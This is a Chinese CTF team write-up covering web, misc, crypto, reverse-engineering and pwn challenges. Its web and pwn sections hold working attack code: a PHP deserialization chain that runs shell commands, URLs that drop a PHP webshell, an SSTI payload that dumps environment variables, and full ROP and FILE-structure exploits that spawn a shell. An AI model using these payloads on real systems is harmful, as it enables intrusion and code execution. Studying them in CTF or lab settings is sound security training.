# 前言

本次混了一个第 7

# web

# web1

H:__destruct---> Hacker:__tostring

exp:

	<?php

	error_reporting(0);
	class Hacker{
	private $exp;
	private $cmd;

	public function __toString()
	{
	call_user_func('system', "cat /flag");
	}
	}

	class A
	{
	public $hacker;
	public function __toString()
	{
	echo $this->hacker->name;
	return "";
	}
	}
	class C
	{
	public $finish;
	public function __get($value)
	{
	$this->finish->hacker();
	echo 'nonono';
	}
	}
	class E
	{
	public $hacker;

	public function __invoke($parms1)
	{
	echo $parms1;
	$this->hacker->welcome();
	}
	}

	class H
	{
	public $username;
	public function __destruct()
	{
	$this->welcome();

	}
	public function welcome()
	{
	echo "welcome~ ".$this->username;
	}
	}

	class K
	{
	public $func;
	public function __call($method,$args)
	{
	call_user_func($this->func,'welcome');
	}
	}

	class R
	{
	private $method="phpinfo";
	private $args;

	public function welcome()
	{
	if ($this->key === true && $this->finish1->name) {
	if ($this->finish->finish) {
	call_user_func_array($this->method,$this->args);
	}
	}
	}
	}
	$a=new H();
	$a->username=new Hacker();
	echo(serialize($a));

# web2

用 glob 进行匹配

	import string
	import requests

	url = "http://172.10.0.5/"
	path = "backdoor_"
	zidian="0123456789abcdefghigklmnopqrstorwxyz."
	flag = path
	while True:
	for i in zidian:
	data = {"filename": "glob://" + flag + i + "*"}
	#print(data)
	re = requests.post(url, data=data).text
	#print()
	if "yes" in re:
	flag += i
	print(flag)
	break

数组绕过进行命令执行

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22dir%20/%22);

获取 flag

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22cat%20/flag%22);

# Web-Escape

原题：Archived Challenges - ImaginaryCTF 和这个 Helpful - BONUS，是一样的直接用官网上的 payload 打了

http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=1

flag{d467150b-6e0b-4a9a-96c1-2148c6edcd5f}

# Web-Tera

题目打开

很明确的一个模版注入的题目

# WEB-HTTP

这里打开页面是一个游戏，没什么东西，先扫描一下目录

这里有一个 /swagger-resources 目录这里去找了一下文章

这里找了一下相关文章 Swagger 未授权访问漏洞 - 腾讯云开发者社区 - 腾讯云 (tencent.com)

这里是存在 Swagger 未授权访问漏洞，检索到了一个 /swagger-ui/index.html 目录，这里访问

这里点击 proxy

这里点击 try it out

这里多了一个 url 参数可控

这里换种访问方式

使用 file 协议去访问，发现现实协议无效，这里 p 牛的知识星有说过，这里使用 url：绕过

然后这里显示只能展示 html，使用 #绕过即可

# MISC

# Misc - 我的壁纸

拿到附件用 foremost 分离出三个文件

文本文件

使用 snow 解密

密码：snowday

拿到了一部分

音频文件是无线电，题目上也给了提示使用 Robot 36

然后扫描二维码

中间一段，图片使用 steghide 解

密码是：7hR@1nB0w$

拼接一下即可

# Crypto

# leak rsa

深搜拿到高位，但是出现了很多，说明不是完全正确的

	N=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
	C=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
	gift=2223117424030234543005449667053988296724455736030907136592525175314696509716321
	from Crypto.Util.number import *
	PQ = [('', '')]
	pq_add0=[('0','0'), ('1','1')]
	pq_add1=[('0','1'), ('1','0')]
	b_gift='0'+bin(gift)[2:]
	pq_add2=pq_add1+pq_add0
	for i in range(262):
	pq=[]
	for p_org, q_org in PQ:
	if b_gift[i]=='0':
	for a,b in pq_add0:
	p_if,q_if=p_org+a,q_org+b
	p_min,p_max=p_if.ljust(512,'0'),p_if.ljust(512,'1')
	q_min,q_max=q_if.ljust(512,'0'),q_if.ljust(512,'1')
	if int(p_min,2) * int(q_min,2) <= N <= int(p_max,2) * int(q_max,2):
	pq.append((p_if, q_if))
	elif b_gift[i] == '1':
	for a, b in pq_add1:
	p_if, q_if = p_org + a, q_org + b
	p_min, p_max = p_if.ljust(512, '0'), p_if.ljust(512, '1')
	q_min, q_max = q_if.ljust(512, '0'), q_if.ljust(512, '1')
	if int(p_min, 2) * int(q_min, 2) <= N <= int(p_max, 2) * int(q_max, 2):
	pq.append((p_if, q_if))
	PQ = pq
	print(PQ)

我们尝试对一位爆破

	from Crypto.Util.number import *
	D=[]
	p=[('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010')]
	for i in range(len(p)):
	for j in range(2):
	D.append(int(p[i][j]+'0',2))
	D.append(int(p[i][j]+'1',2))

放在 copper 里面进行爆破

	n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
	p=[7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837]

	pbits=512
	for p4 in p:
	kbits=pbits - p4.nbits()
	print (p4.nbits())
	p4 = p4 << kbits
	PR.<x> = PolynomialRing(Zmod(n))
	f = x + p4
	roots = f.small_roots(X=2^kbits,beta=0.5,epsilon=0.01)
	print(roots)

拿到一组比较短的就行，与之对应的 p 或 q

	p4=11975359106462250866004610445325637689150797603362754225369957476901819007810757
	kbits=512-p4.bit_length()
	p4 = p4 << kbits
	p=p4+611414793025621783063521676721076724031914595699228956891999095186369770019
	n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
	q=n//p
	c=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
	d=inverse(65537,(p-1)*(q-1))
	print(long_to_bytes(pow(c,d,n)))
	# b'flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}'

# SecretShare

前面是 mt19937，因为够 624，可以直接预测随机数，然后构造矩阵解决得到 p，然后正常解 rsa 就行

	import re
	from randcrack import RandCrack
	from sage.all import matrix, Zmod, inverse_mod
	from Crypto.Util.number import *
	with open("output.txt", "rb") as output:
	f = output.read()

	def extract_numbers(string):
	l = r'\d+'
	numbers = re.findall(l, string)
	return numbers

	def get_predict(X):
	D = []
	for i in range(20):
	for j in range(1024 // 32):
	T.append((X[i] >> (32 * j)) % 2 ** 32)
	D = D[-624:]
	rc = RandCrack()
	for i in range(624):
	rc.submit(D[i])
	x = rc.predict_getrandbits(1024)
	return x

	data = extract_numbers(f)
	X, R = [], []
	for i in range(0, len(data), 2):
	X.append(int(data[i]))
	R.append(int(data[i + 1]))

	X.append(get_predict(X))
	R.append(leak)

	XX = matrix(Zmod(p), 21, 21)
	for i in range(21):
	for j in range(21):
	XX[i, j] = pow(X[j], i, p)

	R = matrix(Zmod(p), R)
	A = XX.solve_left(R)
	secret = ZZ(A.list()[0])
	new_p = secret
	new_q = N // new_p
	d = inverse_mod(65537, (new_p - 1) * (new_q - 1))
	flag = long_to_bytes(pow(C, d, N))
	print(flag)

# re

# Re - 安全编程

puzzle solver 扫一下，发现直接异或 0x80 就能出，当成 misc，属实非预期了。
MYI2`EQL)BH~{6LO7)LE5Z9.png

# Re-babyre

先跑随机数

	#include<stdlib.h>
	#include<iostream>
	#include<windows.h>
	using namespace std;
	int main() {
	srand(0xdeadc0de);
	for (int i = 0;i < 32 * 7;++i)
	printf("0x%x,", rand());

	return 0;
	}

本来想用 z3 解决的，但是没炸出来，

	from z3 import *
	c=[BitVec("c%d"%i,8) for i in range(12)]
	s=c[:]
	p=Solver()
	rd=[]
	for k in range(32):
	for i in range(12):
	s[i]=(23*s[i]+66)&0xff
	v5 = (s[3] << 24) \| (s[2] << 16) \| (s[1] << 8) \| s[0]
	v6 = (s[7] << 24) \| (s[6] << 16) \| (s[5] << 8) \| s[4]
	v7 = (s[11] << 24) \| (s[10] << 16) \| (s[9] << 8) \| s[8]
	v11 = (v6 >> 7)&0xffffffff
	v12 = (rd[k*6+0] + v11)&0xffffffff
	v13 = ((v6 >> 15) ^ (v6 << 10) \| 3)&0xffffffff
	v5 += v12 + (rd[k*6+1] ^ v13)
	v5 &=0xffffffff
	v11 = (v7 >> 7)&0xffffffff
	v12 = (rd[k*6+2] + v11)&0xffffffff
	v13 = ((v7 >> 15) ^ (v7 << 10) \| 3)&0xffffffff
	v6 += v12 + (rd[k*6+3] ^ v13)
	v6&=0xffffffff
	v11 = (v5 >> 7)&0xffffffff
	v12 = rd[k*6+4] + v11
	v12&=0xffffffff
	v13 = (v5 >> 15) ^ (v5 << 10) \| 3
	v13&=0xffffffff
	v7 += v12 + (rd[k*6+5]^ v13)
	v7&=0xffffffff
	s[0]=v5&0xff
	s[1]=(v5>>8)&0xff
	s[2]=(v5>>16)&0xff
	s[3]=(v5>>24)&0xff
	s[4]=v6&0xff
	s[5]=(v6>>8)&0xff
	s[6]=(v6>>16)&0xff
	s[7]=(v6>>24)&0xff
	s[8]=v7&0xff
	s[9]=(v7>>8)&0xff
	s[10]=(v7>>16)&0xff
	s[11]=(v7>>24)&0xff
	p.add(v5==0xA0484D3B)
	p.add(v6==0x27312854)
	p.add(v7==0x6DF12135)
	print(p.check())

后来考虑写解密算法，大小端还是比较绕的，前面解完，最后 encrypt1 的解密还是采用的爆破解的

	rand=[0x4df2,0x7125,0x3739,0xde6,0x2755,0x7a13,0x7e6a,0x2ea4,0xd66,0x6d41,0x39ff,0x2cc9,0x2f8f,0x233d,0x6bde,0x1fef,0x2f12,0x4018,0x5065,0x194e,0x4555,0x106b,0x575c,0x8e0,0x247c,0x3798,0x2927,0x7dc4,0x463d,0x1352,0xc40,0x45e1,0x1cf0,0x7860,0x3ee5,0x30cb,0x5ae6,0x2c9d,0x190e,0x79ea,0x43fc,0x4244,0xaa2,0x1dd9,0x3d70,0x386a,0x49ea,0x1f0c,0xff3,0x4cc,0x4646,0x7db6,0xfff,0x6acb,0x331f,0x66e9,0x206a,0x43b5,0x3f1c,0x5eff,0x433c,0x1c46,0x4b99,0x6b3a,0x2cbe,0x4b6f,0x3855,0x7ea7,0xcd3,0x6655,0x176a,0x2e48,0x28b,0x359d,0x5d83,0x7071,0x6df6,0xfe7,0x6249,0x6b73,0x1436,0x3d98,0x451e,0x1778,0x49d8,0x49dd,0xa0e,0x37ae,0x1765,0x64ed,0x302,0x6ea8,0xc33,0x3b8e,0x5937,0x7201,0x3381,0x67da,0x4aef,0x2142,0x5fc3,0x5f43,0x7167,0x405,0x403b,0x1d5,0x2308,0x735b,0x74c9,0x2ebb,0x45e1,0x726c,0x1404,0x205,0x2655,0x7a5d,0x5789,0x1fa8,0x2611,0x3d77,0x6294,0x2fc6,0x5742,0x2585,0x56cd,0x7030,0x5804,0x117d,0x2b64,0x7f2a,0x21d,0x1663,0x7a5f,0x436e,0x42eb,0x476b,0x3833,0x1573,0x2f9b,0x495e,0x992,0xdee,0x299c,0x353e,0x2b85,0x1d9a,0x2753,0xe2d,0x21ba,0x5234,0x7511,0x4e8b,0x1f1f,0x6cca,0x242,0x505f,0x5cb0,0x2d36,0xee7,0x14f8,0x528c,0x76e6,0x4d46,0x2fd4,0x74f,0x32de,0x4bdf,0x58c0,0x699c,0x12ff,0x3ba3,0x6941,0x67f9,0x1a89,0x6661,0x4933,0x3ae0,0xfdf,0x6981,0xeb0,0x1512,0x3b8a,0x8f4,0x5533,0x2e2f,0x1881,0x2e6b,0xffd,0x5b84,0x59a7,0x68c7,0x5bb8,0x2b24,0x6896,0x7fd1,0x135b,0x353a,0x419b,0x702c,0x2c4d,0x179d,0x5101,0x6388,0x1dcd,0x4fa5,0x3593,0x7917,0x5791,0x663e,0xc5c,0x7245,0xbad,0x223a,0x29b1,0x17a4,0x4fb7,0x34ec,0x6372,0x6a25,0x5929,0x14f2,0x508c,0x748e,0x5906]
	randi=0
	dict1={}
	def encrypt1(c):
	return (23*(c)+66)&0xff
	for i in range(256):
	dict1[encrypt1(i)]=i
	c=[0x48, 0x4d, 0x3b, 0xa0, 0x27, 0x31, 0x28, 0x54, 0x6d, 0xf1, 0x21, 0x35, 0x18, 0x73, 0x6a, 0x4c, 0x71, 0x3b, 0xbd, 0x98, 0xb6, 0x5a, 0x77, 0x2d, 0xb, 0x2b, 0xcb, 0x9b, 0xe4, 0x8a, 0x4c, 0xa9, 0x5c, 0x4f, 0x1b, 0xf1, 0x98, 0x3d, 0x30, 0x59, 0x3f, 0x14, 0xfc, 0x7a, 0xf4, 0x64, 0x2, 0x2b]
	for ip in range(0,len(c),12):
	randi = 191
	for _ in range(32):
	getenc=c[ip:ip+12]
	data=[i for i in getenc]
	data1=[]
	for i in range(0,len(data),4):
	data1.append(int.from_bytes(data[i:i+4],"little"))
	get = data1

	v23 = get[0] >> 7
	v24 = rand[randi-1] + v23
	v25 = (get[0] >> 15) ^ (get[0] << 10) \| 3
	data1[2] -= v24 + (rand[randi] ^ v25)
	data1[2] &= 0xffffffff
	randi -= 2

	v23 = get[2] >> 7
	v24 = rand[randi-1] + v23
	v25 = (get[2] >> 15) ^ (get[2] << 10) \| 3
	data1[1] -= v24 + (rand[randi] ^ v25)
	data1[1] &= 0xffffffff
	randi -= 2

	v23 = get[1] >> 7
	v24 = rand[randi-1] + v23
	v25 = (get[1] >> 15) ^ (get[1]<< 10) \| 3
	data1[0] -= v24 + (rand[randi] ^ v25)
	data1[0]&=0xffffffff
	randi -= 2

	for x in range(3):
	i1=[i for i in bytes.fromhex(hex(data1[x])[2:].rjust(8,"0"))][::-1]
	for i2 in range(4):
	c[ip+4*x+i2]=dict1[i1[i2]]
	print("".join(map(chr,c)))

# Re-BadRe

DIE 能扫出来是 64 位程序，但是跑不起来，猜测是 PE 结构有问题，上 CFF Explorer

发现这个 ATOM 段有问题 Raw Address 错误。

这边是对这个 Section 解密
跑起来 dump

发现实际上解密出来了一个 PE 文件，可以看到 PE 头了，然后 dump 下这个节，下面的应该是 PE 重载的过程

载入后发现是个 rc4

解出来就行 flag

# pwn

# PWN-silent

# 程序分析

就是直接溢出，没有开启 canary , 沙箱禁用了 execve , 难点就是调用的函数太少需要不断布局控制执行流，刚开始是想用 gadget 直接修改不用爆破但是没有找到。
思路就是利用 read 修改 bss 段中残留的 libc 地址为 syscall （并利用爆破），然后利用 read 控制 rax 调用 write 泄露 libc 打一个 orw

# exp

	from pwn import *

	# 设置 libc 和二进制文件
	libc = ELF("/home/clown/Desktop/libc-2.27.so")
	elf = ELF("./silent")

	# 定义 ROP Gadgets 和地址
	ret = 0x4008FD
	pop_rdi = 0x400963
	pop_rsi_r15 = 0x400961
	bss1 = 0x601010
	bss2 = 0x6010A0
	leave = 0x4008FC
	pop_rsp_3xx = 0x40095D
	null = 0x602088
	bss_libc = 0x601030 - 0x28

	def start(p):
	# 阶段 1：泄漏 libc 地址
	payload = b'a' * 0x40 + p64(bss2 - 0x18) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss2 - 0x10) + p64(0) + p64(elf.plt['read']) + p64(leave)
	p.send(payload)
	sleep(0.1)

	# 准备 ROP 链以泄漏 libc 地址
	payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss_libc) + p64(0) + p64(elf.plt['read'])
	payload += p64(pop_rsp_3xx) + p64(0x6010D0 - 0x18) # 返回到 ROP 链
	payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601038) + p64(0) + p64(elf.plt['read'])
	payload += p64(pop_rsi_r15) + p64(null) + p64(0) + p64(elf.plt['read'])
	payload += p64(pop_rsp_3xx) + p64(bss_libc - 0x18)
	p.send(payload)
	sleep(0.1)

	# 触发系统调用以泄漏 libc 地址
	payload = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['alarm']) + p64(0) + b'\xf5\x54\x4A'
	p.send(payload)
	sleep(0.1)

	# 阶段 2：执行 ROP 以打开 / 读取 / 写入文件
	payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601068) + p64(0) + p64(elf.plt['read'])
	p.send(payload)
	sleep(0.1)

	# 发送一个空字节来终止读取系统调用
	p.send('0')
	sleep(0.1)
	try:
	# 计算 libc 基址
	libc_base = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00')) - libc.symbols['alarm']
	log.info(f'libc_base: {hex(libc_base)}')

	# 计算 libc 中的 ROP gadgets 和函数地址
	pop_rdx = libc_base + 0x1B96
	open_addr = libc_base + 0x10FBF0
	write_addr = libc_base + 0x1100F0
	read_addr = libc_base + 0x110020
	flag = 0x601118

	# 用于打开 / 读取 / 写入 flag 文件的 ROP 链
	payload = p64(pop_rdi) + p64(flag) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(open_addr)
	payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
	payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
	payload += b"flag\x00\x00\x00"
	sleep(0.1)
	p.sendline(payload)
	p.interactive()
	except:
	print('出错了')
	p.close()
	return

	while True:
	p = remote("172.10.0.8", 9999)
	start(p)

# Pwn-Auto_Coffee_machine

本题是一个菜单堆题，存在 UAF 漏洞，可以打 tcache bin attack，也可以打一个非预期，索引为负的漏洞，打 stdout 结构体，io leak 泄露 libc，再打一个 stdin 结构体任意地址写，修改 atol 的 got 表为 system，最后手写一个 sh 即可

	from tools import *
	context.log_level='debug'
	p,e,libc=load('pwn',"172.10.0.9:8888")
	p.sendlineafter(">>>",str(4421))

	payload=p64(0x6e7770207473756a)+p64(0x746920)
	p.sendafter("please input the admin password\n",payload)

	p.sendlineafter(">>>",str(2))

	p.sendlineafter(">>>",str(3))
	p.sendlineafter(">>>",str(-107-14+76))
	payload=p64(0xfbad1887)+p64(0)*3+b'\x00'
	p.send(payload)
	libc_base=recv_libc()-0x1ec980

	p.sendlineafter(">>>",str(2))
	p.sendlineafter(">>>",str(3))
	p.sendlineafter(">>>",str(-107-14+76+2))

	payload=p64(0xfbad1800)+p64(0)*6+p64(0x406068)+p64(0x406070)+b'\x00'
	p.send(payload)
	p.sendlineafter('>>>',str(3))

	p.sendlineafter(">>>",str(1))
	p.sendlineafter("input the id of what coffee you want to buy\n",str(1))
	p.sendafter("Do you want to add something?Y/N\n",'Y')
	sys_addr=libc_base+libc.symbols['system']
	p.send(p64(sys_addr))
	p.sendline("sh\x00")
	p.interactive()

VNCTF